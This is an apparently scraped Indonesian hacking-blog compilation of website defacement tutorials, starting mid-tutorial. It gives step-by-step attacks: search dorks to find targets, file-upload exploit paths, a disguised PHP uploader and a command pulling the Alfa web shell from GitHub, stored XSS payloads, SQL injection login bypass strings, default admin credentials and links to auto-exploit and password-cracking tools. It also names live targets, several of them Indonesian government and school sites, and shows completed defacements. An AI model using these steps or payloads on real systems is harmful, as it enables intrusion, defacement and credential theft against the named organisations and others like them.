mana saja buat sendiri juga bisa, bapac kau juga bisa Sekarang cari targetnya dengan
menggunakan dork diatas. Lalu daftar dulu di LMS nya, ganti url target nya seperti
contoh dibawah ini :

Url : https://target.com/chamilo
https://target.com/chamilo/main/auth/inscription.php
Url : https://target.com https://target.com/main/auth/inscription.php

Setelah mendaftar. Ganti url menjadi : /main/social/myfiles.php


Lalu upload file nya dengan klik tombol upload.

Upload file uploader ( File gif ) yang tadi sudah di buat. Lalu rename filenya dan ubah
formatnya menjadi php5 atau php7. Semisal nama filenya uploader.gif ubah
menjadi uploader.php5.
Lokasi file nya dapat di lihat di informasi file nya:

Buka File Uploadernya, pilih file deface. File deface akan di upload di direktori yang
sama denga file uploadernya. Contoh :

Url :http://target.com/app/upload/users/3/30/my_files/uploader.php5 Maka file deface


dapat diakses di
http://target.com/app/upload/users/3/30/my_files/nama_script_deface.php Isi direktori
dengan "../" untuk upload ke folder sebelumnya. Jika ingin mundur 2 folder isi dengan
"../../" dst. Lalu klik "Execute" untuk upload file defacenya.

-jika bingung- Jika kalian bingung dengan cara di atas. Kalian bisa memakai shell Alfa.
Tambahkan parameter pada file uploadernya. Sehingga urlnya menjadi.
Url:http://target.com/[path]/uploader.php5?url=https://github.com/backdoorhub/shell-
backdoor-list/blob/master/shell/php/alfa.php
done

Deface Metode Stored XSS

Halo Sobat Xploit !! Kali Ini Mimin Bakalan Share Tutorial deface dengan metode
Stored XSS.. Ok Langsung Saja !!

Bahan & Alat :


- Hp, PC/Laptop
- Jaringan Internet
- Script Jso atau bisa juga menggunakan payload xss

payload xss :
- <script>alert(xss by);</script>
- <script>prompt(document.domain)</script>

Dork :
- Inurl:/guestbook-add.html
- inurl:/guestbook.html ( Kembangkan lagi Ya :D )

Dorking Dulu !!

Disini Mimin sudah dapat targetnya

1. isi data asal-asalan kecuali bagian pesan dan captcha, di bagian pesan klian bisa isi
dengan payload xss atau juga script jso, lihat contoh gambar ini :
2. Jika Sudah langsung kalian kirim, kalian bisa cek apa sudah terstored xss dengan
cara http://webnya.com/guestbook.html

3. done

Live Target : https://dukcapil.kulonprogokab.go.id/v2/guestbook-add.html

Sekian Dari Gw #No_IDentiTy - LinuXploit


Deface Metode SQL-I Balitbang

HOLLA GW THROVINUS MEMBER YG PALING GANS:"V DISINI GW AKAN MATERI


YAITU....DEFACE POC BALITBANG AUTO EXPLOITER
CIEEE NUNGGU WKWKWK
OK DH LANGSUNG AJA:")

SIAPKAN DULU LH BAHAN NYA:"V

* DORK

Website engine's code is copyright © 2017 Tim Balitbang Kemdikbud versi


180707
Website engine's code is copyright © 2017 Tim Balitbang Kemdikbud versi
190116
Website engine's code is copyright © 2017 Tim Balitbang Kemdikbud versi
181128
Website engine's code is copyright © 2017 Tim Balitbang Kemdikbud versi
170317
Website engine's code is copyright © 2017 Tim Balitbang Kemdikbud versi
181016
Website engine's code is copyright © 2017 Tim Balitbang Kemdikbud versi
180313

(KEMBANGIN LG LAH COK.....)

* EXPLOIT

users/listmemberall.php ATAU member/listmemberall.php


* TOOLS AUTO EXPLOIT

https://tools.xploitsecid.or.id/Defacer/Auto-balitbang
https://tools.xploitsecid.or.id/Defacer/Crack-balitbang (UTK CRACK PASSWORD NYA
NANTI)

* SHELL/MINI SHELL/SC DEFACE

NB : AING SARANIN YG MINISHELL AJA, SPY WEB NYA BISA NGANGKAT

BAHAN BAHAN NYA DH LENGKAP? NEXT TO TUTOR :")

1. DORKING DULU LH GAESSS

2. CARI WEB NYA, SETELAH DPT WEB NYA, LANGSUNG MASUKIN EXPLOIT NYA

users/listmemberall.php ATAU member/listmemberall.php

CONTOH : webtarget.sch.id/users/listmemberall.php

NB: SEBELUM MASUKIN EXPLOIT NYA, CEK DULU ADLOG NYA, CARA NYA
TINGGAL NAMBAHIN KATA admin
CONTOH: webtarget.sch.id/admin

3. KALAU VULN, TAMPILAN NYA BLANK

4. BUKA TOOLSNYA https://tools.xploitsecid.or.id/Defacer/Auto-balitbang

5. MASUKIN WEB TARGET BESERTA EXPLOIT NYA

6. KLIK START INJECT

7. AKAN MUNCUL TUH USERNAME DAN PASSWORD NYA (KALAU TIDAK


MUNCUL, YH BERARTI G VULN, CARI WEB LAIN)

8. PASSWORD NYA HARUS DI CRACK DULU, CARA CRACK NYA?


BUKA https://tools.xploitsecid.or.id/Defacer/Crack-balitbang
MASUKIN PASSWORD YG MAU DI CRACK TADI, DAN TADAAA HASILNYA
MUNCUL:")

9. MASUK KE ADLOG NYA, MASUKIN USERNAME DAN PASSWORD NYA

10. TADA..... SUKSES MASUK KE DASHBOARD NYA

11. MAU UPLOAD SHELL?


KLIK YG BACAAN NYA SETTING ADMIN => TRUS KLIK POSISI MODUL =>KLIK
TAMBAH POSISI MODUL => UPLOAD SHELL/MINI SHELL KALIAN => SIMPAN

TINGGAL AKSES DEH SHELL NYA


webtarget.sch.id/modul/namashell.php

DAN TADAA LUH TINGGAL UP SC DEFACE TRUS MIRROR :"V

OK SEKIAN DARI GW, TQ

HAPPY HACKING :")

Deface Metode Bypass SQL Login


1} dork "inurl:/admin/login.php kembangin lagi ya

2} Terus pilih Web nya dan cari yang vuln bypass sql login dan isi username dan
password dengan ' or 1=1 limit 1 -- -+

2} dan kalau vuln bakal masuk ke halaman dashboard admin contoh:


3} Dan kalau udah masuk dashboard admin bisa up Shell atau gak bisa di jso;)

Nih gw ada live target :http://perfecttyres.com/admin/dashboard.php

Monggo di eksekusi;)

Deface Metode Bug Asik + JSO


Assalamualaikum wr wb....

Welcome Back To My Blog mek :)


Kali ini gw Adesta_Gans mau ngasih tutor, Yang simpel² aja, dan nggak ribet mudah di
Praktekin su:v
Langsung aja ke tutornya:)

1. Dork : "aplikasi sistem informasi kelulusan"


"aplikasi sistem informasi kelulusan2019"
"aplikasi sistem informasi kelulusan2018"

2. Scirpt jso, kalau kalian ga punya scirpt jso bisa liat tutor di blog saya :)

https://4destat3rsakiti.blogspot.com/2019/09/assalamualaikum-wr-wb-di-
kesempatan.html?m=1

Oke kalean Ngedork dlu pake dork di atas mamank...Dan Pilih Menu hubungi dibagian
atas. Maka tampilannya akan berubah seperti di bawah ini.
#next

kalian isi scirpt jso kalian di bagian pesan , contoh pada gambar di bawah.

Cara melihat hasil defacenya tinggal tambahin


/admin/hubungi.php

Hasil > http://smknusantara-tuba.sch.id/unbk/admin/hubungi.php

!peringatan!
Deface seperti ini gampang ketikung..jdi klo ke tikung ikhlas ne wae:v

Ok Sekian tutor dari saya bila ada salahnya mohon mapp sebesar-besarnya ..
Wassmualaikum wr wb.

Deface Metode Default U/P CMS Salatiga Web

Hallo Balik Lagi Ama mimin disini :).. kali ini mimin bakalan share tutorial deface
metode Default Username & Pass CMS SalatigaWeb Ok Sebelum Ke tutorial
jangan lupa Follow Instagram Mimin dulu : @youebay_ ntar di follback kok :)

Alat & Bahan :


- Jaringan Internet
- Hp/Pc
- Dork : inurl:/timeline/
"Maintenance By SalatigaWeb.com" (Kembangkan lagi )
- Default Uname & Passwrd :
username: jhunk
password: jhunk1990

username: masagung
password: jhunk1990

Step By Step :
1. Dorking Dulu.. Kalo Udah Pilih Salah Satu Web Dan Cek Admin Loginnya dengan
cara targetmu.com/timeline login Dengan Username & Password Diatas ( Pilih Salah
Satunya )

2. Kalo Vuln Nanti Bakal Masuk Ke Dashboard Admin.. Kalo Udah Masuk.. Tau Kan
Mau di apakan Webnya ??
Note : Upshell Berada Di Laman Identitas Website

Ok Segitu Aja Yang Bisa mimin sampaikan :).. kurang lebih mohon maaf.. good bye N
See u next Time :*

Tutorial SQL Lokomedia With AutoXploit tools

OK Gays.. Balik Lagi Ama Admin Disini :D.. Kali Ini Mimin bakalan share tutorial
deface metode SQL Lokomedia Dengan Tools AutoXploit.. Ok Langsung Aja Ya..
Sebelumnya Jangan Lupa Untuk Follow Instagram Mimin Ya : @youebay_ Ntar Di
follback kok :)

Alat & Bahan :


- Kuota Internet / Jaringan Wifi
- Hp, Pc / Laptop
- Tools Lokomedia AutoXploit Link => http://tools.xploit4.fun/
- dork : klik Sini => Dork

Tutorial :

1. Kalian Dorking Dulu Ya hehe Dengan Dork Yg Mimin bagi di atas ..


2. Kalo Udah Dorking.. Langsung Aja Pilih Web Site Yg menurut kalian vuln..

3. Buka Link Tools Di Atas.. Dan Pilih Tools Lokomedia AutoXploit Dan Masukkan Link
Target Kalian Dan Klik Start..
4. Jika Vuln Maka Akan Muncul Username Dan Password Web Tersebut.. Kalian Hash
Passnya Dan Cari Admin Login.. Kalo Sudah Login Tau Kan Mau Klian Apakan ??
Heheh

OK Itu aja Ya yg bisa Mimin Sampaikan

See U Next Time

Tutorial Deface Metode Bypass Admin


Halo Gays ketemu lg ama Gw Youe gans :v.. kali ini gw bakal share tutorial
Deface Metode bypass admin ya.. lngsung aja simak

Bahan-Bahan :
- Hp/pc
- Script deface
- shell backdoor ( kalo ga punya lu download :v )
- jaringan internet
- dork : inurl:/admin/login.php intext:username
inurl:/admin/index.php
inurl:/admin_login intitle:login

Kalian Kembangin lg dorknya geh.. gbisa ngembangin dork ? cek artikel ini KLIK SINI
BUJANKK

Nah lngsung aja ke step By step nya :)

1. Dorking dulu lah bujankk.. tp seperti biasanya gw selalu nyiapin live target buat kalian
smua :v.. nih gw ksih http://www.veenayogakendra.com/admin/ , kalo udh msuk klian
lngsung login dengan username & password ini '=''or'
2. nah kalo vuln klian bakalan bisa msuk webnya.. klian cari lah tempat upload apa kek..
disitu ada tempat upload di bgian gallery..

3. Kalo Udh Klian Tinggal upload shell bujank.. kek gini.. dan klik add photo..
4. Kalo udh.. klian klik + tahan gambar pecah itu dan buka di tab baru

5. Kalo Dah Msuk Ke shell klian.. Klian Tinggal Upload Sc dipes aja :v.. soalnya webnya
g bisa di tebas :v..
6. Kalo dah.. klian Tinggal pnggil sc depes klian :v.. contoh
http://site.com/admin/gallery/namasc.html / php

7. Booomm... ter depes seperti heker pero :v

Terimakasih bagi yg sudah mampir..


semoga bermanfaat..
Deface Metode Regmem JSO
Halo Gays Balik Lagi Ama Gw Youe Gans :v.. Kali Ini gw Bakal Share Materi, Cara
Deface Regmem Jso ya.. langsung aja ke Step By Step Nya..

Alat Dan Bahan :

1. Hp/Pc
2. Jaringan Internet
3. Script Jso
4. Dork : Inurl:/Kontribtor

Ok Langsung Aja Ke Step By Stepnya..

1. Dorking Dulu Ea Bambankk.. tp disini krena gw baik, gw ksih live targetnya


: http://beranda.tolitolikab.go.id/kontributor klo dah masuk webnya klian lngsung
daftar aja.. ngasal juga gpp.. yg penting captcha nya klian isi yg bener
2. Kalo udh klian lngsung klik modul berita, trus klik berita..

3. kalo udh.. klian lngsung klik tambahkan data..


4. setelah itu klian isi judul berita sesuai keinginan klian.. dan di bagian
keterangan gambar.. klian truh script jso klian, sperti gambar dibawah.. gabisa
buat script jso ?? gw truh video cara buatnya di bawah artikel ini.. stelah klian
udh isi, klian lngsung aja klik "tambahkan"..

5. Jika sudah di tambahkan.. klian tinggal panggil aja :v.. contoh :


www.site.com/berita/detail/nama-berita-lu

6. dan booomm.. ter depes layaknya hekel plo :v.. ni klo mau liat web hsil dipes
gw http://beranda.tolitolikab.go.id/berita/detail/youe-ganss

Terimakasih Yg Udh Mampir Di Blog ini :)


Semoga Artikel Ini Bermanfaat Untuk Klian

Deface Metode Regmem

Halo Gays Balik Lagi Ama Gw Youe Kali Ini Gw Bakal Ksih Tutorial Deface Metode
Regmem Ya.. Ok langsung aja Ke Tutornya..
Bahan-Bahan:

1. Hp/Pc
2. Jaringan Internet
3. Sc Deface extensi php.pjpeg ( tinggal Ubah nama aja cok )
4. Dork : Inurl:/register
Inurl:/member.php (kembangin lagi dorknya)

step by step :

1. dorking dulu lah pake dork diatas.. tp disini gw ada live target.. ini dia
: https://puspadeli.deliserdangkab.go.id langsung aja msuk web nya.. klo udh
msuk klian klik register.. dan isi datanya.. boleh ngasal.. tp email hrus email aktif..

kalo udh klik registrasi.. nnti klian bakalan dikirim verifikasi email..

2.kalo udh langsung login aja pake username ama pass yg lu buat tadi
3. kalo udh login langsung aja klik kolom buat pengaduan..

4. Kalian Isi ngasal aja.. dan di bagian foto.. msukkan sc deface klian yg ber
extensi .php.pjpeg ingatt bukan ext html.. nama sc gw wht.php.pjpeg .. kalian isi
dua kolom foto itu dengan sc deface klian.. kalo udh langsung aja klik proses..
5. kalo udh langsung akses aja hsil deface klian.. cara akses
?? https://puspadeli.deliserdangkab.go.id/photo/namasc.php.pjpeg

6. dan boom.. sc klian berhasil ter upload

Makasih Yg Udah Mampir Yaa..


Semoga Bermanfaat
Deface Metode Zicepanel Exploit
Halo Gayn Balik Lg Ama Gw Youe.. Kali Ini Gw Bakal Share Tutor Deface Metode
Zicepanel Exploit.. Sangad Ezz.. Langsung Aja Simak Tutornya ;)

Alat/bahan
1.Dork
2.Exploit
3.Csrf onlen
4.Hp
47
5.Internet
6.browser

Step by step .

1.Dorking di google
Dork : inurl:/themes/zicepanel/ klo udh.. tinggal kalian pilih aja web yg menurut klian
vuln :v

2.pilih salah satu webnya kalo dah masukin exploitnya


Exploit : /themes/zicepanel/components/uploadify/uploadify.php di akhir domain.. Kalo
vuln maka akan blank kek gini

3.masok ke csrf onlen di google banyak beb tapi gw pake yang ni


Csrf onlen : http://albasti.com/csrf.php di url target.. kalian isi link web target kalian.. isi
Post file : Filedata kek gini
4. kalo udh kaliaKalo berhasil maka akan muncul huruf/angka acak

5. Salin huruf/angka acak tersebut paste ke belakang web


contoh :
https://www.meridahammocks.com/I5iyLzR6u2wC4YmfaFUn7ADNgdxrj9lb.htm

6. dan boom terupload sc klian :v


Thanks Yang Udh mampir :)

Semoga bermanfaat ya :)

Deface Metode Wp-Content Chameleon


Halo Gays Balik Lagi Ama gw Youe yg sangad gans :v.. Kali ini gw bakal share tutorial
Deface Metode wp-content chameleon langsung aja ke step by stepnya

Bahan :

- Hp/pc
- Dork : inurl:/wp-content/themes/cameleon
- CSRF Exploiter Klik Disini Bujank
- exploit : /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

- jaringan internet
- kesabaran :v
- live target http://jhdlaw.com

Step By Step :

1. Masukin Dork Ke gugel ea..


2. Nah Klo udh Pilih web yg menurut kalian vuln :v.. btw gw pake live target ya :)

3. nah kalo sudah masuk webnya.. kalian masukkan exploit yg diatas di akhir domain
web tersebut.. contoh http://website.com/wp-
content/themes/cameleon/includes/fileuploader/upload_handler.php
jika muncul tulian "error no were file upload" berarti web itu vuln.. kek gini :v

4. Kalian Langsung Buka Csrf exploiternya ( link diatas td ) dan kalian copy web target
kalian dan paste di bagian url target.. dan Post File kalian tulis aja qqfile kek gini
5. nah kalo udh kalian pilih sc deface yang mau kalian upload.. kalo udah langsung aja
klik upload.. Like This N00b :v

6. Tandanya file berhasil terupload kek gini


7. Nah kalo udh kek gitu tinggal kita akses aja hasil deface nya :) contoh :
http://website.com/wp-content/uploads/tahun/bulan/namasckalian.html

8. Dan booomm.. berhasil..


yg mau liat hsil deface ku http://jhdlaw.com/wp-content/uploads/2019/06/-,.htm

Makasih Buat Kalian Yg Udah Mampir Ya..


semoga Bermanfaat :)
Deface Metode File Attachment Upload Repository
Ok gays Balik Lagi Ama Gw Youe Gans :v.. Kali Ini gw bakal share tutorial deface
metode attachment file upload + live target buat pembelajaran..
ok langsung aja simak step by stepnya..

Bahan-bahan:

- Hp/Pc
- Jaringan Internet
- Sc deface berbentuk txt
- exploit : admin/modules/bibliography/pop_attach.php
- kesabaran :v
- dork : - pustaka.*.go.id
- pustaka.*.ac.id
- pustaka.*.sch.id
- Live target: http://pustaka.pa-boyolali.go.id/

step by step :

1. Masukin Dork Ke gugel ea..

2. Pilih webnya.. disini gw pake live target :v


3. Nah kalian masukkan exploit yg diatas tadi.. msukin di akhir web nya ya.. contoh :
http://tolol.com/ jadinya klo dh ditambahin exploit >
http://tolol.com/admin/modules/bibliography/pop_attach.php
nah klo webnya vuln bakal jdi kek gini :v..

4. Nahk Kalo Sudah Kalian masukkan Masukkan Sc Deface txt kalian, klik tulisan
browse dan pilih sc deface yg mau klian msukkan, dan isi judulnya sesuai nama sc
deface kalian.. disini sc deface saya namanya 707.txt berarti judulnya akan saya isi
707.txt juga.. dan klik tombol unggah sekarang..
5. Dan Taraaa.. berhasil terupload.. cara manggilnya ? contoh :
http://tolol.com/repository/NamaScKalian.txt

Terimakasih Bagi Yang sudah mampir.. cukup mudah bukan ??.. maaf apabila ada
salah kata ya.. kurang lebihnya mohon dimaklumkan :)..

Deface Metode Kawai File Hosting


Yo Wassap Balik Lagi Ama Gw Youe Gans :v.. Kali Ini Gw bakalan Share Tutorial
Deface Metode Kawaii File Host Ya... Lngsung Aja Di Simak okeh..
Bahan-bahan :

- Hp/pc
- Sc Deface
- Jaringan Internet
- Nyawa :v
- Dork : - Kawaii File Host
- Kawaii File Hosting ( pilih salah satu :v )

Oke langsung aja Ke step by step nya

1. Pertama Dorking Dulu Lah Bujank

Msukin Dork Diatas Ke gugel Lalu Pilih Salah Satu Web

2. Kalo udah Klik Select Drop File Dan Pilih Sc Deface Kalian
3. Kalo Udh Ter upload Tinggal Klik Link Yg Muncul Di bawah Tombol Upload
Tadi..

4. Kalo Udh Klik + Tahan dan klik buka di tab yg baru.. :D


5. Tarraaaa Sc Deface Kalian Berhasil TerUpload :D

cukup Simpel Ya.. Terimakasih Sudah Mampir Di Blog Saya :D.. Semoga Bermanfaat..
mohon maaf apabila ada yg kurang :D.. Byeeeee...

My Youtube Channel
Klik Disini :D

Ok Teman Teman, Mungkin itu saja yang bisa saya sampaikan


Salam Hangat : Bayu Santoso / #No_IDeNtiTy

Team : XploitSec
Komunitas : LinuXploit

Anda mungkin juga menyukai